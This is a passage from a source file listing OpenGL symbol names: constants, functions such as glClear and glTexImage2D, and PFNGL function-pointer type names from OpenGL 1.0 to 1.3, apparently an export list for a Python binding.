'GL_BITMAP_TOKEN', 'GL_DRAW_PIXEL_TOKEN', 'GL_COPY_PIXEL_TOKEN',
'GL_PASS_THROUGH_TOKEN', 'GL_FEEDBACK_BUFFER_POINTER',
'GL_FEEDBACK_BUFFER_SIZE', 'GL_FEEDBACK_BUFFER_TYPE',
'GL_SELECTION_BUFFER_POINTER', 'GL_SELECTION_BUFFER_SIZE', 'GL_FOG',
'GL_FOG_MODE', 'GL_FOG_DENSITY', 'GL_FOG_COLOR', 'GL_FOG_INDEX',
'GL_FOG_START', 'GL_FOG_END', 'GL_LINEAR', 'GL_EXP', 'GL_EXP2', 'GL_LOGIC_OP',
'GL_INDEX_LOGIC_OP', 'GL_COLOR_LOGIC_OP', 'GL_LOGIC_OP_MODE', 'GL_CLEAR',
'GL_SET', 'GL_COPY', 'GL_COPY_INVERTED', 'GL_NOOP', 'GL_INVERT', 'GL_AND',
'GL_NAND', 'GL_OR', 'GL_NOR', 'GL_XOR', 'GL_EQUIV', 'GL_AND_REVERSE',
'GL_AND_INVERTED', 'GL_OR_REVERSE', 'GL_OR_INVERTED', 'GL_STENCIL_BITS',
'GL_STENCIL_TEST', 'GL_STENCIL_CLEAR_VALUE', 'GL_STENCIL_FUNC',
'GL_STENCIL_VALUE_MASK', 'GL_STENCIL_FAIL', 'GL_STENCIL_PASS_DEPTH_FAIL',
'GL_STENCIL_PASS_DEPTH_PASS', 'GL_STENCIL_REF', 'GL_STENCIL_WRITEMASK',
'GL_STENCIL_INDEX', 'GL_KEEP', 'GL_REPLACE', 'GL_INCR', 'GL_DECR', 'GL_NONE',
'GL_LEFT', 'GL_RIGHT', 'GL_FRONT_LEFT', 'GL_FRONT_RIGHT', 'GL_BACK_LEFT',
'GL_BACK_RIGHT', 'GL_AUX0', 'GL_AUX1', 'GL_AUX2', 'GL_AUX3', 'GL_COLOR_INDEX',
'GL_RED', 'GL_GREEN', 'GL_BLUE', 'GL_ALPHA', 'GL_LUMINANCE',
'GL_LUMINANCE_ALPHA', 'GL_ALPHA_BITS', 'GL_RED_BITS', 'GL_GREEN_BITS',
'GL_BLUE_BITS', 'GL_INDEX_BITS', 'GL_SUBPIXEL_BITS', 'GL_AUX_BUFFERS',
'GL_READ_BUFFER', 'GL_DRAW_BUFFER', 'GL_DOUBLEBUFFER', 'GL_STEREO',
'GL_BITMAP', 'GL_COLOR', 'GL_DEPTH', 'GL_STENCIL', 'GL_DITHER', 'GL_RGB',
'GL_RGBA', 'GL_MAX_LIST_NESTING', 'GL_MAX_EVAL_ORDER', 'GL_MAX_LIGHTS',
'GL_MAX_CLIP_PLANES', 'GL_MAX_TEXTURE_SIZE', 'GL_MAX_PIXEL_MAP_TABLE',
'GL_MAX_ATTRIB_STACK_DEPTH', 'GL_MAX_MODELVIEW_STACK_DEPTH',
'GL_MAX_NAME_STACK_DEPTH', 'GL_MAX_PROJECTION_STACK_DEPTH',
'GL_MAX_TEXTURE_STACK_DEPTH', 'GL_MAX_VIEWPORT_DIMS',
'GL_MAX_CLIENT_ATTRIB_STACK_DEPTH', 'GL_ATTRIB_STACK_DEPTH',
'GL_CLIENT_ATTRIB_STACK_DEPTH', 'GL_COLOR_CLEAR_VALUE', 'GL_COLOR_WRITEMASK',
'GL_CURRENT_INDEX', 'GL_CURRENT_COLOR', 'GL_CURRENT_NORMAL',
'GL_CURRENT_RASTER_COLOR', 'GL_CURRENT_RASTER_DISTANCE',
'GL_CURRENT_RASTER_INDEX', 'GL_CURRENT_RASTER_POSITION',
'GL_CURRENT_RASTER_TEXTURE_COORDS', 'GL_CURRENT_RASTER_POSITION_VALID',
'GL_CURRENT_TEXTURE_COORDS', 'GL_INDEX_CLEAR_VALUE', 'GL_INDEX_MODE',
'GL_INDEX_WRITEMASK', 'GL_MODELVIEW_MATRIX', 'GL_MODELVIEW_STACK_DEPTH',
'GL_NAME_STACK_DEPTH', 'GL_PROJECTION_MATRIX', 'GL_PROJECTION_STACK_DEPTH',
'GL_RENDER_MODE', 'GL_RGBA_MODE', 'GL_TEXTURE_MATRIX',
'GL_TEXTURE_STACK_DEPTH', 'GL_VIEWPORT', 'GL_AUTO_NORMAL', 'GL_MAP1_COLOR_4',
'GL_MAP1_INDEX', 'GL_MAP1_NORMAL', 'GL_MAP1_TEXTURE_COORD_1',
'GL_MAP1_TEXTURE_COORD_2', 'GL_MAP1_TEXTURE_COORD_3',
'GL_MAP1_TEXTURE_COORD_4', 'GL_MAP1_VERTEX_3', 'GL_MAP1_VERTEX_4',
'GL_MAP2_COLOR_4', 'GL_MAP2_INDEX', 'GL_MAP2_NORMAL',
'GL_MAP2_TEXTURE_COORD_1', 'GL_MAP2_TEXTURE_COORD_2',
'GL_MAP2_TEXTURE_COORD_3', 'GL_MAP2_TEXTURE_COORD_4', 'GL_MAP2_VERTEX_3',
'GL_MAP2_VERTEX_4', 'GL_MAP1_GRID_DOMAIN', 'GL_MAP1_GRID_SEGMENTS',
'GL_MAP2_GRID_DOMAIN', 'GL_MAP2_GRID_SEGMENTS', 'GL_COEFF', 'GL_ORDER',
'GL_DOMAIN', 'GL_PERSPECTIVE_CORRECTION_HINT', 'GL_POINT_SMOOTH_HINT',
'GL_LINE_SMOOTH_HINT', 'GL_POLYGON_SMOOTH_HINT', 'GL_FOG_HINT',
'GL_DONT_CARE', 'GL_FASTEST', 'GL_NICEST', 'GL_SCISSOR_BOX',
'GL_SCISSOR_TEST', 'GL_MAP_COLOR', 'GL_MAP_STENCIL', 'GL_INDEX_SHIFT',
'GL_INDEX_OFFSET', 'GL_RED_SCALE', 'GL_RED_BIAS', 'GL_GREEN_SCALE',
'GL_GREEN_BIAS', 'GL_BLUE_SCALE', 'GL_BLUE_BIAS', 'GL_ALPHA_SCALE',
'GL_ALPHA_BIAS', 'GL_DEPTH_SCALE', 'GL_DEPTH_BIAS',
'GL_PIXEL_MAP_S_TO_S_SIZE', 'GL_PIXEL_MAP_I_TO_I_SIZE',
'GL_PIXEL_MAP_I_TO_R_SIZE', 'GL_PIXEL_MAP_I_TO_G_SIZE',
'GL_PIXEL_MAP_I_TO_B_SIZE', 'GL_PIXEL_MAP_I_TO_A_SIZE',
'GL_PIXEL_MAP_R_TO_R_SIZE', 'GL_PIXEL_MAP_G_TO_G_SIZE',
'GL_PIXEL_MAP_B_TO_B_SIZE', 'GL_PIXEL_MAP_A_TO_A_SIZE', 'GL_PIXEL_MAP_S_TO_S',
'GL_PIXEL_MAP_I_TO_I', 'GL_PIXEL_MAP_I_TO_R', 'GL_PIXEL_MAP_I_TO_G',
'GL_PIXEL_MAP_I_TO_B', 'GL_PIXEL_MAP_I_TO_A', 'GL_PIXEL_MAP_R_TO_R',
'GL_PIXEL_MAP_G_TO_G', 'GL_PIXEL_MAP_B_TO_B', 'GL_PIXEL_MAP_A_TO_A',
'GL_PACK_ALIGNMENT', 'GL_PACK_LSB_FIRST', 'GL_PACK_ROW_LENGTH',
'GL_PACK_SKIP_PIXELS', 'GL_PACK_SKIP_ROWS', 'GL_PACK_SWAP_BYTES',
'GL_UNPACK_ALIGNMENT', 'GL_UNPACK_LSB_FIRST', 'GL_UNPACK_ROW_LENGTH',
'GL_UNPACK_SKIP_PIXELS', 'GL_UNPACK_SKIP_ROWS', 'GL_UNPACK_SWAP_BYTES',
'GL_ZOOM_X', 'GL_ZOOM_Y', 'GL_TEXTURE_ENV', 'GL_TEXTURE_ENV_MODE',
'GL_TEXTURE_1D', 'GL_TEXTURE_2D', 'GL_TEXTURE_WRAP_S', 'GL_TEXTURE_WRAP_T',
'GL_TEXTURE_MAG_FILTER', 'GL_TEXTURE_MIN_FILTER', 'GL_TEXTURE_ENV_COLOR',
'GL_TEXTURE_GEN_S', 'GL_TEXTURE_GEN_T', 'GL_TEXTURE_GEN_R',
'GL_TEXTURE_GEN_Q', 'GL_TEXTURE_GEN_MODE', 'GL_TEXTURE_BORDER_COLOR',
'GL_TEXTURE_WIDTH', 'GL_TEXTURE_HEIGHT', 'GL_TEXTURE_BORDER',
'GL_TEXTURE_COMPONENTS', 'GL_TEXTURE_RED_SIZE', 'GL_TEXTURE_GREEN_SIZE',
'GL_TEXTURE_BLUE_SIZE', 'GL_TEXTURE_ALPHA_SIZE', 'GL_TEXTURE_LUMINANCE_SIZE',
'GL_TEXTURE_INTENSITY_SIZE', 'GL_NEAREST_MIPMAP_NEAREST',
'GL_NEAREST_MIPMAP_LINEAR', 'GL_LINEAR_MIPMAP_NEAREST',
'GL_LINEAR_MIPMAP_LINEAR', 'GL_OBJECT_LINEAR', 'GL_OBJECT_PLANE',
'GL_EYE_LINEAR', 'GL_EYE_PLANE', 'GL_SPHERE_MAP', 'GL_DECAL', 'GL_MODULATE',
'GL_NEAREST', 'GL_REPEAT', 'GL_CLAMP', 'GL_S', 'GL_T', 'GL_R', 'GL_Q',
'GL_VENDOR', 'GL_RENDERER', 'GL_VERSION', 'GL_EXTENSIONS', 'GL_NO_ERROR',
'GL_INVALID_ENUM', 'GL_INVALID_VALUE', 'GL_INVALID_OPERATION',
'GL_STACK_OVERFLOW', 'GL_STACK_UNDERFLOW', 'GL_OUT_OF_MEMORY',
'GL_CURRENT_BIT', 'GL_POINT_BIT', 'GL_LINE_BIT', 'GL_POLYGON_BIT',
'GL_POLYGON_STIPPLE_BIT', 'GL_PIXEL_MODE_BIT', 'GL_LIGHTING_BIT',
'GL_FOG_BIT', 'GL_DEPTH_BUFFER_BIT', 'GL_ACCUM_BUFFER_BIT',
'GL_STENCIL_BUFFER_BIT', 'GL_VIEWPORT_BIT', 'GL_TRANSFORM_BIT',
'GL_ENABLE_BIT', 'GL_COLOR_BUFFER_BIT', 'GL_HINT_BIT', 'GL_EVAL_BIT',
'GL_LIST_BIT', 'GL_TEXTURE_BIT', 'GL_SCISSOR_BIT', 'GL_ALL_ATTRIB_BITS',
'GL_PROXY_TEXTURE_1D', 'GL_PROXY_TEXTURE_2D', 'GL_TEXTURE_PRIORITY',
'GL_TEXTURE_RESIDENT', 'GL_TEXTURE_BINDING_1D', 'GL_TEXTURE_BINDING_2D',
'GL_TEXTURE_INTERNAL_FORMAT', 'GL_ALPHA4', 'GL_ALPHA8', 'GL_ALPHA12',
'GL_ALPHA16', 'GL_LUMINANCE4', 'GL_LUMINANCE8', 'GL_LUMINANCE12',
'GL_LUMINANCE16', 'GL_LUMINANCE4_ALPHA4', 'GL_LUMINANCE6_ALPHA2',
'GL_LUMINANCE8_ALPHA8', 'GL_LUMINANCE12_ALPHA4', 'GL_LUMINANCE12_ALPHA12',
'GL_LUMINANCE16_ALPHA16', 'GL_INTENSITY', 'GL_INTENSITY4', 'GL_INTENSITY8',
'GL_INTENSITY12', 'GL_INTENSITY16', 'GL_R3_G3_B2', 'GL_RGB4', 'GL_RGB5',
'GL_RGB8', 'GL_RGB10', 'GL_RGB12', 'GL_RGB16', 'GL_RGBA2', 'GL_RGBA4',
'GL_RGB5_A1', 'GL_RGBA8', 'GL_RGB10_A2', 'GL_RGBA12', 'GL_RGBA16',
'GL_CLIENT_PIXEL_STORE_BIT', 'GL_CLIENT_VERTEX_ARRAY_BIT',
'GL_ALL_CLIENT_ATTRIB_BITS', 'GL_CLIENT_ALL_ATTRIB_BITS', 'glClearIndex',
'glClearColor', 'glClear', 'glIndexMask', 'glColorMask', 'glAlphaFunc',
'glBlendFunc', 'glLogicOp', 'glCullFace', 'glFrontFace', 'glPointSize',
'glLineWidth', 'glLineStipple', 'glPolygonMode', 'glPolygonOffset',
'glPolygonStipple', 'glGetPolygonStipple', 'glEdgeFlag', 'glEdgeFlagv',
'glScissor', 'glClipPlane', 'glGetClipPlane', 'glDrawBuffer', 'glReadBuffer',
'glEnable', 'glDisable', 'glIsEnabled', 'glEnableClientState',
'glDisableClientState', 'glGetBooleanv', 'glGetDoublev', 'glGetFloatv',
'glGetIntegerv', 'glPushAttrib', 'glPopAttrib', 'glPushClientAttrib',
'glPopClientAttrib', 'glRenderMode', 'glGetError', 'glGetString', 'glFinish',
'glFlush', 'glHint', 'glClearDepth', 'glDepthFunc', 'glDepthMask',
'glDepthRange', 'glClearAccum', 'glAccum', 'glMatrixMode', 'glOrtho',
'glFrustum', 'glViewport', 'glPushMatrix', 'glPopMatrix', 'glLoadIdentity',
'glLoadMatrixd', 'glLoadMatrixf', 'glMultMatrixd', 'glMultMatrixf',
'glRotated', 'glRotatef', 'glScaled', 'glScalef', 'glTranslated',
'glTranslatef', 'glIsList', 'glDeleteLists', 'glGenLists', 'glNewList',
'glEndList', 'glCallList', 'glCallLists', 'glListBase', 'glBegin', 'glEnd',
'glVertex2d', 'glVertex2f', 'glVertex2i', 'glVertex2s', 'glVertex3d',
'glVertex3f', 'glVertex3i', 'glVertex3s', 'glVertex4d', 'glVertex4f',
'glVertex4i', 'glVertex4s', 'glVertex2dv', 'glVertex2fv', 'glVertex2iv',
'glVertex2sv', 'glVertex3dv', 'glVertex3fv', 'glVertex3iv', 'glVertex3sv',
'glVertex4dv', 'glVertex4fv', 'glVertex4iv', 'glVertex4sv', 'glNormal3b',
'glNormal3d', 'glNormal3f', 'glNormal3i', 'glNormal3s', 'glNormal3bv',
'glNormal3dv', 'glNormal3fv', 'glNormal3iv', 'glNormal3sv', 'glIndexd',
'glIndexf', 'glIndexi', 'glIndexs', 'glIndexub', 'glIndexdv', 'glIndexfv',
'glIndexiv', 'glIndexsv', 'glIndexubv', 'glColor3b', 'glColor3d', 'glColor3f',
'glColor3i', 'glColor3s', 'glColor3ub', 'glColor3ui', 'glColor3us',
'glColor4b', 'glColor4d', 'glColor4f', 'glColor4i', 'glColor4s', 'glColor4ub',
'glColor4ui', 'glColor4us', 'glColor3bv', 'glColor3dv', 'glColor3fv',
'glColor3iv', 'glColor3sv', 'glColor3ubv', 'glColor3uiv', 'glColor3usv',
'glColor4bv', 'glColor4dv', 'glColor4fv', 'glColor4iv', 'glColor4sv',
'glColor4ubv', 'glColor4uiv', 'glColor4usv', 'glTexCoord1d', 'glTexCoord1f',
'glTexCoord1i', 'glTexCoord1s', 'glTexCoord2d', 'glTexCoord2f',
'glTexCoord2i', 'glTexCoord2s', 'glTexCoord3d', 'glTexCoord3f',
'glTexCoord3i', 'glTexCoord3s', 'glTexCoord4d', 'glTexCoord4f',
'glTexCoord4i', 'glTexCoord4s', 'glTexCoord1dv', 'glTexCoord1fv',
'glTexCoord1iv', 'glTexCoord1sv', 'glTexCoord2dv', 'glTexCoord2fv',
'glTexCoord2iv', 'glTexCoord2sv', 'glTexCoord3dv', 'glTexCoord3fv',
'glTexCoord3iv', 'glTexCoord3sv', 'glTexCoord4dv', 'glTexCoord4fv',
'glTexCoord4iv', 'glTexCoord4sv', 'glRasterPos2d', 'glRasterPos2f',
'glRasterPos2i', 'glRasterPos2s', 'glRasterPos3d', 'glRasterPos3f',
'glRasterPos3i', 'glRasterPos3s', 'glRasterPos4d', 'glRasterPos4f',
'glRasterPos4i', 'glRasterPos4s', 'glRasterPos2dv', 'glRasterPos2fv',
'glRasterPos2iv', 'glRasterPos2sv', 'glRasterPos3dv', 'glRasterPos3fv',
'glRasterPos3iv', 'glRasterPos3sv', 'glRasterPos4dv', 'glRasterPos4fv',
'glRasterPos4iv', 'glRasterPos4sv', 'glRectd', 'glRectf', 'glRecti',
'glRects', 'glRectdv', 'glRectfv', 'glRectiv', 'glRectsv', 'glVertexPointer',
'glNormalPointer', 'glColorPointer', 'glIndexPointer', 'glTexCoordPointer',
'glEdgeFlagPointer', 'glGetPointerv', 'glArrayElement', 'glDrawArrays',
'glDrawElements', 'glInterleavedArrays', 'glShadeModel', 'glLightf',
'glLighti', 'glLightfv', 'glLightiv', 'glGetLightfv', 'glGetLightiv',
'glLightModelf', 'glLightModeli', 'glLightModelfv', 'glLightModeliv',
'glMaterialf', 'glMateriali', 'glMaterialfv', 'glMaterialiv',
'glGetMaterialfv', 'glGetMaterialiv', 'glColorMaterial', 'glPixelZoom',
'glPixelStoref', 'glPixelStorei', 'glPixelTransferf', 'glPixelTransferi',
'glPixelMapfv', 'glPixelMapuiv', 'glPixelMapusv', 'glGetPixelMapfv',
'glGetPixelMapuiv', 'glGetPixelMapusv', 'glBitmap', 'glReadPixels',
'glDrawPixels', 'glCopyPixels', 'glStencilFunc', 'glStencilMask',
'glStencilOp', 'glClearStencil', 'glTexGend', 'glTexGenf', 'glTexGeni',
'glTexGendv', 'glTexGenfv', 'glTexGeniv', 'glGetTexGendv', 'glGetTexGenfv',
'glGetTexGeniv', 'glTexEnvf', 'glTexEnvi', 'glTexEnvfv', 'glTexEnviv',
'glGetTexEnvfv', 'glGetTexEnviv', 'glTexParameterf', 'glTexParameteri',
'glTexParameterfv', 'glTexParameteriv', 'glGetTexParameterfv',
'glGetTexParameteriv', 'glGetTexLevelParameterfv', 'glGetTexLevelParameteriv',
'glTexImage1D', 'glTexImage2D', 'glGetTexImage', 'glGenTextures',
'glDeleteTextures', 'glBindTexture', 'glPrioritizeTextures',
'glAreTexturesResident', 'glIsTexture', 'glTexSubImage1D', 'glTexSubImage2D',
'glCopyTexImage1D', 'glCopyTexImage2D', 'glCopyTexSubImage1D',
'glCopyTexSubImage2D', 'glMap1d', 'glMap1f', 'glMap2d', 'glMap2f',
'glGetMapdv', 'glGetMapfv', 'glGetMapiv', 'glEvalCoord1d', 'glEvalCoord1f',
'glEvalCoord1dv', 'glEvalCoord1fv', 'glEvalCoord2d', 'glEvalCoord2f',
'glEvalCoord2dv', 'glEvalCoord2fv', 'glMapGrid1d', 'glMapGrid1f',
'glMapGrid2d', 'glMapGrid2f', 'glEvalPoint1', 'glEvalPoint2', 'glEvalMesh1',
'glEvalMesh2', 'glFogf', 'glFogi', 'glFogfv', 'glFogiv', 'glFeedbackBuffer',
'glPassThrough', 'glSelectBuffer', 'glInitNames', 'glLoadName', 'glPushName',
'glPopName', 'GL_RESCALE_NORMAL', 'GL_CLAMP_TO_EDGE',
'GL_MAX_ELEMENTS_VERTICES', 'GL_MAX_ELEMENTS_INDICES', 'GL_BGR', 'GL_BGRA',
'GL_UNSIGNED_BYTE_3_3_2', 'GL_UNSIGNED_BYTE_2_3_3_REV',
'GL_UNSIGNED_SHORT_5_6_5', 'GL_UNSIGNED_SHORT_5_6_5_REV',
'GL_UNSIGNED_SHORT_4_4_4_4', 'GL_UNSIGNED_SHORT_4_4_4_4_REV',
'GL_UNSIGNED_SHORT_5_5_5_1', 'GL_UNSIGNED_SHORT_1_5_5_5_REV',
'GL_UNSIGNED_INT_8_8_8_8', 'GL_UNSIGNED_INT_8_8_8_8_REV',
'GL_UNSIGNED_INT_10_10_10_2', 'GL_UNSIGNED_INT_2_10_10_10_REV',
'GL_LIGHT_MODEL_COLOR_CONTROL', 'GL_SINGLE_COLOR',
'GL_SEPARATE_SPECULAR_COLOR', 'GL_TEXTURE_MIN_LOD', 'GL_TEXTURE_MAX_LOD',
'GL_TEXTURE_BASE_LEVEL', 'GL_TEXTURE_MAX_LEVEL', 'GL_SMOOTH_POINT_SIZE_RANGE',
'GL_SMOOTH_POINT_SIZE_GRANULARITY', 'GL_SMOOTH_LINE_WIDTH_RANGE',
'GL_SMOOTH_LINE_WIDTH_GRANULARITY', 'GL_ALIASED_POINT_SIZE_RANGE',
'GL_ALIASED_LINE_WIDTH_RANGE', 'GL_PACK_SKIP_IMAGES', 'GL_PACK_IMAGE_HEIGHT',
'GL_UNPACK_SKIP_IMAGES', 'GL_UNPACK_IMAGE_HEIGHT', 'GL_TEXTURE_3D',
'GL_PROXY_TEXTURE_3D', 'GL_TEXTURE_DEPTH', 'GL_TEXTURE_WRAP_R',
'GL_MAX_3D_TEXTURE_SIZE', 'GL_TEXTURE_BINDING_3D', 'glDrawRangeElements',
'glTexImage3D', 'glTexSubImage3D', 'glCopyTexSubImage3D',
'PFNGLDRAWRANGEELEMENTSPROC', 'PFNGLTEXIMAGE3DPROC', 'PFNGLTEXSUBIMAGE3DPROC',
'PFNGLCOPYTEXSUBIMAGE3DPROC', 'GL_CONSTANT_COLOR',
'GL_ONE_MINUS_CONSTANT_COLOR', 'GL_CONSTANT_ALPHA',
'GL_ONE_MINUS_CONSTANT_ALPHA', 'GL_COLOR_TABLE',
'GL_POST_CONVOLUTION_COLOR_TABLE', 'GL_POST_COLOR_MATRIX_COLOR_TABLE',
'GL_PROXY_COLOR_TABLE', 'GL_PROXY_POST_CONVOLUTION_COLOR_TABLE',
'GL_PROXY_POST_COLOR_MATRIX_COLOR_TABLE', 'GL_COLOR_TABLE_SCALE',
'GL_COLOR_TABLE_BIAS', 'GL_COLOR_TABLE_FORMAT', 'GL_COLOR_TABLE_WIDTH',
'GL_COLOR_TABLE_RED_SIZE', 'GL_COLOR_TABLE_GREEN_SIZE',
'GL_COLOR_TABLE_BLUE_SIZE', 'GL_COLOR_TABLE_ALPHA_SIZE',
'GL_COLOR_TABLE_LUMINANCE_SIZE', 'GL_COLOR_TABLE_INTENSITY_SIZE',
'GL_CONVOLUTION_1D', 'GL_CONVOLUTION_2D', 'GL_SEPARABLE_2D',
'GL_CONVOLUTION_BORDER_MODE', 'GL_CONVOLUTION_FILTER_SCALE',
'GL_CONVOLUTION_FILTER_BIAS', 'GL_REDUCE', 'GL_CONVOLUTION_FORMAT',
'GL_CONVOLUTION_WIDTH', 'GL_CONVOLUTION_HEIGHT', 'GL_MAX_CONVOLUTION_WIDTH',
'GL_MAX_CONVOLUTION_HEIGHT', 'GL_POST_CONVOLUTION_RED_SCALE',
'GL_POST_CONVOLUTION_GREEN_SCALE', 'GL_POST_CONVOLUTION_BLUE_SCALE',
'GL_POST_CONVOLUTION_ALPHA_SCALE', 'GL_POST_CONVOLUTION_RED_BIAS',
'GL_POST_CONVOLUTION_GREEN_BIAS', 'GL_POST_CONVOLUTION_BLUE_BIAS',
'GL_POST_CONVOLUTION_ALPHA_BIAS', 'GL_CONSTANT_BORDER', 'GL_REPLICATE_BORDER',
'GL_CONVOLUTION_BORDER_COLOR', 'GL_COLOR_MATRIX',
'GL_COLOR_MATRIX_STACK_DEPTH', 'GL_MAX_COLOR_MATRIX_STACK_DEPTH',
'GL_POST_COLOR_MATRIX_RED_SCALE', 'GL_POST_COLOR_MATRIX_GREEN_SCALE',
'GL_POST_COLOR_MATRIX_BLUE_SCALE', 'GL_POST_COLOR_MATRIX_ALPHA_SCALE',
'GL_POST_COLOR_MATRIX_RED_BIAS', 'GL_POST_COLOR_MATRIX_GREEN_BIAS',
'GL_POST_COLOR_MATRIX_BLUE_BIAS', 'GL_POST_COLOR_MATRIX_ALPHA_BIAS',
'GL_HISTOGRAM', 'GL_PROXY_HISTOGRAM', 'GL_HISTOGRAM_WIDTH',
'GL_HISTOGRAM_FORMAT', 'GL_HISTOGRAM_RED_SIZE', 'GL_HISTOGRAM_GREEN_SIZE',
'GL_HISTOGRAM_BLUE_SIZE', 'GL_HISTOGRAM_ALPHA_SIZE',
'GL_HISTOGRAM_LUMINANCE_SIZE', 'GL_HISTOGRAM_SINK', 'GL_MINMAX',
'GL_MINMAX_FORMAT', 'GL_MINMAX_SINK', 'GL_TABLE_TOO_LARGE',
'GL_BLEND_EQUATION', 'GL_MIN', 'GL_MAX', 'GL_FUNC_ADD', 'GL_FUNC_SUBTRACT',
'GL_FUNC_REVERSE_SUBTRACT', 'GL_BLEND_COLOR', 'glColorTable',
'glColorSubTable', 'glColorTableParameteriv', 'glColorTableParameterfv',
'glCopyColorSubTable', 'glCopyColorTable', 'glGetColorTable',
'glGetColorTableParameterfv', 'glGetColorTableParameteriv', 'glBlendEquation',
'glBlendColor', 'glHistogram', 'glResetHistogram', 'glGetHistogram',
'glGetHistogramParameterfv', 'glGetHistogramParameteriv', 'glMinmax',
'glResetMinmax', 'glGetMinmax', 'glGetMinmaxParameterfv',
'glGetMinmaxParameteriv', 'glConvolutionFilter1D', 'glConvolutionFilter2D',
'glConvolutionParameterf', 'glConvolutionParameterfv',
'glConvolutionParameteri', 'glConvolutionParameteriv',
'glCopyConvolutionFilter1D', 'glCopyConvolutionFilter2D',
'glGetConvolutionFilter', 'glGetConvolutionParameterfv',
'glGetConvolutionParameteriv', 'glSeparableFilter2D', 'glGetSeparableFilter',
'PFNGLBLENDCOLORPROC', 'PFNGLBLENDEQUATIONPROC', 'GL_TEXTURE0', 'GL_TEXTURE1',
'GL_TEXTURE2', 'GL_TEXTURE3', 'GL_TEXTURE4', 'GL_TEXTURE5', 'GL_TEXTURE6',
'GL_TEXTURE7', 'GL_TEXTURE8', 'GL_TEXTURE9', 'GL_TEXTURE10', 'GL_TEXTURE11',
'GL_TEXTURE12', 'GL_TEXTURE13', 'GL_TEXTURE14', 'GL_TEXTURE15',
'GL_TEXTURE16', 'GL_TEXTURE17', 'GL_TEXTURE18', 'GL_TEXTURE19',
'GL_TEXTURE20', 'GL_TEXTURE21', 'GL_TEXTURE22', 'GL_TEXTURE23',
'GL_TEXTURE24', 'GL_TEXTURE25', 'GL_TEXTURE26', 'GL_TEXTURE27',
'GL_TEXTURE28', 'GL_TEXTURE29', 'GL_TEXTURE30', 'GL_TEXTURE31',
'GL_ACTIVE_TEXTURE', 'GL_CLIENT_ACTIVE_TEXTURE', 'GL_MAX_TEXTURE_UNITS',
'GL_NORMAL_MAP', 'GL_REFLECTION_MAP', 'GL_TEXTURE_CUBE_MAP',
'GL_TEXTURE_BINDING_CUBE_MAP', 'GL_TEXTURE_CUBE_MAP_POSITIVE_X',
'GL_TEXTURE_CUBE_MAP_NEGATIVE_X', 'GL_TEXTURE_CUBE_MAP_POSITIVE_Y',
'GL_TEXTURE_CUBE_MAP_NEGATIVE_Y', 'GL_TEXTURE_CUBE_MAP_POSITIVE_Z',
'GL_TEXTURE_CUBE_MAP_NEGATIVE_Z', 'GL_PROXY_TEXTURE_CUBE_MAP',
'GL_MAX_CUBE_MAP_TEXTURE_SIZE', 'GL_COMPRESSED_ALPHA',
'GL_COMPRESSED_LUMINANCE', 'GL_COMPRESSED_LUMINANCE_ALPHA',
'GL_COMPRESSED_INTENSITY', 'GL_COMPRESSED_RGB', 'GL_COMPRESSED_RGBA',
'GL_TEXTURE_COMPRESSION_HINT', 'GL_TEXTURE_COMPRESSED_IMAGE_SIZE',
'GL_TEXTURE_COMPRESSED', 'GL_NUM_COMPRESSED_TEXTURE_FORMATS',
'GL_COMPRESSED_TEXTURE_FORMATS', 'GL_MULTISAMPLE',
'GL_SAMPLE_ALPHA_TO_COVERAGE', 'GL_SAMPLE_ALPHA_TO_ONE', 'GL_SAMPLE_COVERAGE',
'GL_SAMPLE_BUFFERS', 'GL_SAMPLES', 'GL_SAMPLE_COVERAGE_VALUE',
'GL_SAMPLE_COVERAGE_INVERT', 'GL_MULTISAMPLE_BIT',
'GL_TRANSPOSE_MODELVIEW_MATRIX', 'GL_TRANSPOSE_PROJECTION_MATRIX',
'GL_TRANSPOSE_TEXTURE_MATRIX', 'GL_TRANSPOSE_COLOR_MATRIX', 'GL_COMBINE',
'GL_COMBINE_RGB', 'GL_COMBINE_ALPHA', 'GL_SOURCE0_RGB', 'GL_SOURCE1_RGB',
'GL_SOURCE2_RGB', 'GL_SOURCE0_ALPHA', 'GL_SOURCE1_ALPHA', 'GL_SOURCE2_ALPHA',
'GL_OPERAND0_RGB', 'GL_OPERAND1_RGB', 'GL_OPERAND2_RGB', 'GL_OPERAND0_ALPHA',
'GL_OPERAND1_ALPHA', 'GL_OPERAND2_ALPHA', 'GL_RGB_SCALE', 'GL_ADD_SIGNED',
'GL_INTERPOLATE', 'GL_SUBTRACT', 'GL_CONSTANT', 'GL_PRIMARY_COLOR',
'GL_PREVIOUS', 'GL_DOT3_RGB', 'GL_DOT3_RGBA', 'GL_CLAMP_TO_BORDER',
'glActiveTexture', 'glClientActiveTexture', 'glCompressedTexImage1D',
'glCompressedTexImage2D', 'glCompressedTexImage3D',
'glCompressedTexSubImage1D', 'glCompressedTexSubImage2D',
'glCompressedTexSubImage3D', 'glGetCompressedTexImage', 'glMultiTexCoord1d',
'glMultiTexCoord1dv', 'glMultiTexCoord1f', 'glMultiTexCoord1fv',
'glMultiTexCoord1i', 'glMultiTexCoord1iv', 'glMultiTexCoord1s',
'glMultiTexCoord1sv', 'glMultiTexCoord2d', 'glMultiTexCoord2dv',
'glMultiTexCoord2f', 'glMultiTexCoord2fv', 'glMultiTexCoord2i',
'glMultiTexCoord2iv', 'glMultiTexCoord2s', 'glMultiTexCoord2sv',
'glMultiTexCoord3d', 'glMultiTexCoord3dv', 'glMultiTexCoord3f',
'glMultiTexCoord3fv', 'glMultiTexCoord3i', 'glMultiTexCoord3iv',
'glMultiTexCoord3s', 'glMultiTexCoord3sv', 'glMultiTexCoord4d',
'glMultiTexCoord4dv', 'glMultiTexCoord4f', 'glMultiTexCoord4fv',
'glMultiTexCoord4i', 'glMultiTexCoord4iv', 'glMultiTexCoord4s',
'glMultiTexCoord4sv', 'glLoadTransposeMatrixd', 'glLoadTransposeMatrixf',
'glMultTransposeMatrixd', 'glMultTransposeMatrixf', 'glSampleCoverage',
'PFNGLACTIVETEXTUREPROC', 'PFNGLSAMPLECOVERAGEPROC',
'PFNGLCOMPRESSEDTEXIMAGE3DPROC', 'PFNGLCOMPRESSEDTEXIMAGE2DPROC',
'PFNGLCOMPRESSEDTEXIMAGE1DPROC', 'PFNGLCOMPRESSEDTEXSUBIMAGE3DPROC',
'PFNGLCOMPRESSEDTEXSUBIMAGE2DPROC', 'PFNGLCOMPRESSEDTEXSUBIMAGE1DPROC',
'PFNGLGETCOMPRESSEDTEXIMAGEPROC', 'GL_ARB_multitexture', 'GL_TEXTURE0_ARB',
'GL_TEXTURE1_ARB', 'GL_TEXTURE2_ARB', 'GL_TEXTURE3_ARB', 'GL_TEXTURE4_ARB',
